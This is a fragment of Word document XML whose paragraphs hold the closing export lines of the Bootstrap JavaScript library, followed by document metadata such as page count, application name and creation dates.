    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Modal = Modal;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Popover = Popover;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Scrollspy = ScrollSpy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Tab = Tab;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Toast = Toast;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  exports.Tooltip = Tooltip;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  Object.defineProperty(exports, '__esModule', { value: true });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>}));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3D0A" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t>//# sourceMappingURL=bootstrap.js.map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F1"/>
    <w:rsid w:val="002E5AB6"/>
    <w:rsid w:val="005529F1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179</Pages>
  <Words>19681</Words>
  <Characters>112186</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>934</Lines>
  <Paragraphs>263</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>131604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2022-11-26T07:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-26T08:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>